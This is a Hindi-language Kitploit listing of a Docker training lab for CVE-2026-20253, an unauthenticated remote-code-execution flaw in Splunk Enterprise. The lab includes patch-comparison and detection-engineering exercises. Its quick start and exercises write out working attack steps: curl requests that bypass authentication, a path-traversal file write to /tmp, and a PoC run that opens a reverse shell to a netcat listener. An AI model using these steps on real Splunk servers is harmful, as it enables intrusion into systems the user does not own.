Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-20253 — Docker लैब वातावरण जिसमें CVE-2026-20253 के लिए PoC exploit और checker है, जो PostgreSQL sidecar सेवा के माध्यम से Splunk Enterprise में एक pre-auth RCE है। | Kitploit
उपकरण/GitHubGitHub/ivanesk315/cve-2026-20253
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारेड टीमिंगलैब और अभ्यास
GitHubivanesk315/cve-2026-20253

CVE-2026-20253

Docker लैब वातावरण जिसमें CVE-2026-20253 के लिए PoC exploit और checker है, जो PostgreSQL sidecar सेवा के माध्यम से Splunk Enterprise में एक pre-auth RCE है।

रिपॉजिटरी देखें
0 दिन पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-20253 लैब वातावरण

PostgreSQL साइडकार सेवा के माध्यम से Splunk Enterprise प्री-ऑथ RCE

CVECVE-2026-20253
CVSS9.8 (गंभीर)
प्रकारअनधिकृत रिमोट कोड निष्पादन
CWECWE-306: महत्वपूर्ण कार्य के लिए अनुपलब्ध प्रमाणीकरण
उत्पादSplunk Enterprise 10.0.x / 10.2.x

अस्वीकरण: यह लैब केवल अधिकृत सुरक्षा अनुसंधान, शिक्षा और पेनेट्रेशन परीक्षण के लिए है। उन सिस्टमों के विरुद्ध इसका उपयोग न करें जिनके आप स्वामी नहीं हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट प्राधिकरण नहीं है।


लैब आर्किटेक्चर

root@kitploit:~
┌──────────────────────────────────────────────────────┐
│                  Docker Network: cve-lab             │
│                  Subnet: 172.20.0.0/24               │
│                                                      │
│  ┌─────────────────────┐   ┌──────────────────────┐  │
│  │  splunk-vulnerable   │   │  attacker            │  │
│  │  172.20.0.10         │   │  172.20.0.50         │  │
│  │                      │   │                      │  │
│  │  Splunk 10.2.3       │   │  Python 3.11         │  │
│  │  Port 8000 (Web)     │   │  nmap, netcat        │  │
│  │  Port 8089 (API)     │   │  postgresql-client   │  │
│  │  Port 8088 (HEC)     │   │  tcpdump             │  │
│  └─────────────────────┘   └──────────────────────┘  │
│                                                      │
│  ┌─────────────────────┐  (optional, profile: patched)│
│  │  splunk-patched      │                             │
│  │  172.20.0.11         │                             │
│  │  Splunk 10.2.4       │                             │
│  │  Port 8001 (Web)     │                             │
│  └─────────────────────┘                             │
└──────────────────────────────────────────────────────┘

पूर्वापेक्षाएँ

  • Docker और Docker Compose
  • Git
  • 8GB+ RAM (Splunk को पर्याप्त मेमोरी की आवश्यकता होती है)
  • इंटरनेट एक्सेस (Docker इमेज खींचने के लिए)

त्वरित शुरुआत

1. कमजोर लैब प्रारंभ करें

root@kitploit:~
# Start Splunk vulnerable + attacker
docker-compose up -d

# Wait for Splunk to initialize (~2-3 minutes)
docker-compose logs -f splunk-vulnerable
# Look for: "Ansible playbook complete, will begin polling for Splunk On..."
# Then:     "Splunk is ready"

2. सत्यापित करें कि Splunk चल रहा है

  • ब्राउज़र खोलें: http://localhost:8000
  • लॉगिन: admin / ChangeMeNow!

3. भेद्यता चेकर चलाएँ

root@kitploit:~
# From host machine
docker exec -it attacker python checker.py -t http://172.20.0.10:8000 -k

# Or enter the attacker container
docker exec -it attacker bash
cd /opt/exploit
python checker.py -t http://172.20.0.10:8000 -k

4. PoC एक्सप्लॉइट चलाएँ

root@kitploit:~
# Enter attacker container
docker exec -it attacker bash

# Check vulnerability
python poc.py -t http://172.20.0.10:8000 --check -k

# Full RCE exploit (start listener first in another terminal)
# Terminal 1 - Listener:
docker exec -it attacker nc -lvnp 4444

# Terminal 2 - Exploit:
docker exec -it attacker python poc.py \
    -t http://172.20.0.10:8000 \
    --rce \
    --lhost 172.20.0.50 \
    --lport 4444 \
    -k

5. (वैकल्पिक) तुलना के लिए पैच किया गया संस्करण प्रारंभ करें

root@kitploit:~
docker-compose --profile patched up -d splunk-patched

# Test against patched instance (should return NOT VULNERABLE)
docker exec -it attacker python checker.py -t http://172.20.0.11:8000 -k

लैब अभ्यास

अभ्यास 1: टोह और भेद्यता पहचान

लक्ष्य: PostgreSQL साइडकार एंडपॉइंट्स की पहचान करें और प्रमाणीकरण बायपास को सत्यापित करें।

root@kitploit:~
# Scan Splunk ports
nmap -sV 172.20.0.10 -p 8000,8089,8088

# Probe sidecar endpoints manually with curl
curl -v -k -u ":" "http://172.20.0.10:8000/en-US/splunkd/__raw/v1/postgres/health"
curl -v -k -u ":" "http://172.20.0.10:8000/en-US/splunkd/__raw/v1/postgres/status"
curl -v -k -u ":" "http://172.20.0.10:8000/en-US/splunkd/__raw/v1/postgres/recovery/backup"

प्रश्न:

  • आप कौन से HTTP स्थिति कोड देखते हैं?
  • Authorization: Basic Og== क्या डिकोड करता है?
  • 400 प्रतिक्रिया भेद्यता को क्यों इंगित करती है (401 के विपरीत)?

अभ्यास 2: फ़ाइल राइट प्रिमिटिव

लक्ष्य: Splunk सर्वर पर मनमाना फ़ाइल निर्माण प्रदर्शित करें।

root@kitploit:~
# Create a test file via the backup endpoint
curl -k -X POST -u ":" \
  "http://172.20.0.10:8000/en-US/splunkd/__raw/v1/postgres/recovery/backup?backupFile=../../../../../../tmp/pwned"

# Verify the file was created
docker exec splunk-vulnerable ls -la /tmp/pwned

अभ्यास 3: पूर्ण RCE श्रृंखला

लक्ष्य: Splunk सर्वर पर कोड निष्पादन प्राप्त करें।

  1. हमलावर मशीन पर एक netcat लिसनर प्रारंभ करें
  2. --rce फ़्लैग के साथ PoC एक्सप्लॉइट चलाएँ
  3. रिवर्स शेल कनेक्शन सत्यापित करें
  4. जाँचें कि शेल के पास कौन सी अनुमतियाँ हैं (whoami, id, ls /opt/splunk/etc/)

अभ्यास 4: पैच डिफ विश्लेषण

लक्ष्य: समझें कि कमजोर और पैच किए गए संस्करणों के बीच क्या बदला।

root@kitploit:~
# Start both vulnerable and patched instances
docker-compose --profile patched up -d

# Compare responses
curl -v -k -u ":" "http://172.20.0.10:8000/en-US/splunkd/__raw/v1/postgres/health"  # 400
curl -v -k -u ":" "http://172.20.0.11:8000/en-US/splunkd/__raw/v1/postgres/health"  # 401

# Diff the relevant Splunk configuration/code
docker exec splunk-vulnerable cat /opt/splunk/etc/apps/splunk_httpinput/default/inputs.conf
docker exec splunk-patched cat /opt/splunk/etc/apps/splunk_httpinput/default/inputs.conf

अभ्यास 5: डिटेक्शन इंजीनियरिंग

लक्ष्य: इस भेद्यता के लिए डिटेक्शन नियम बनाएँ।

  1. कमजोर इंस्टेंस पर Splunk आंतरिक लॉगिंग सक्षम करें
  2. एक्सप्लॉइट चलाएँ
  3. हमले के अवशेषों के लिए index=_internal खोजें
  4. SPL डिटेक्शन क्वेरी लिखें (report/ANALYSIS.md अनुभाग 6 देखें)
  5. एक्सप्लॉइट के विरुद्ध अपने डिटेक्शन का परीक्षण करें

फ़ाइल संरचना

root@kitploit:~
CVE-2026-20253/
├── README.md                    # This file
├── docker-compose.yml           # Lab environment definition
├── attacker/
│   ├── Dockerfile               # Attacker container build
│   └── requirements.txt         # Python dependencies
├── exploit/
│   ├── checker.py               # Vulnerability checker script
│   ├── poc.py                   # PoC exploit (auth bypass → file write → RCE)
│   └── requirements.txt        # Python dependencies
└── report/
    └── ANALYSIS.md              # Root cause analysis & full report

डिबगिंग सुझाव

Splunk कंटेनर प्रारंभ नहीं होगा

root@kitploit:~
docker-compose logs splunk-vulnerable
# Common fix: increase Docker memory to 8GB+

सत्यापित करें कि PostgreSQL साइडकार चल रहा है

root@kitploit:~
docker exec splunk-vulnerable ps aux | grep postgres
docker exec splunk-vulnerable netstat -tlnp | grep 5435

Splunk आंतरिक लॉग का निरीक्षण करें

root@kitploit:~
docker exec splunk-vulnerable cat /opt/splunk/var/log/splunk/splunkd.log | tail -50

लक्ष्य मॉड्यूलर इनपुट स्क्रिप्ट की जाँच करें

root@kitploit:~
docker exec splunk-vulnerable cat /opt/splunk/etc/apps/splunk_secure_gateway/bin/ssg_enable_modular_input.py

विश्लेषण के लिए नेटवर्क ट्रैफ़िक कैप्चर करें

root@kitploit:~
docker exec attacker tcpdump -i eth0 -w /opt/exploit/capture.pcap host 172.20.0.10

सफ़ाई

root@kitploit:~
# Stop and remove all containers
docker-compose --profile patched down

# Remove volumes (delete all Splunk data)
docker-compose --profile patched down -v

# Remove Docker images
docker rmi splunk/splunk:10.2.3 splunk/splunk:10.2.4

संदर्भ

  • पूर्ण मूल कारण विश्लेषण
  • Splunk सलाहकार SVD-2026-0610
  • WatchTowr Labs विश्लेषण और PoC
  • CISA KEV कैटलॉग
  • Picus Security तकनीकी राइटअप
टूल डाउनलोड करें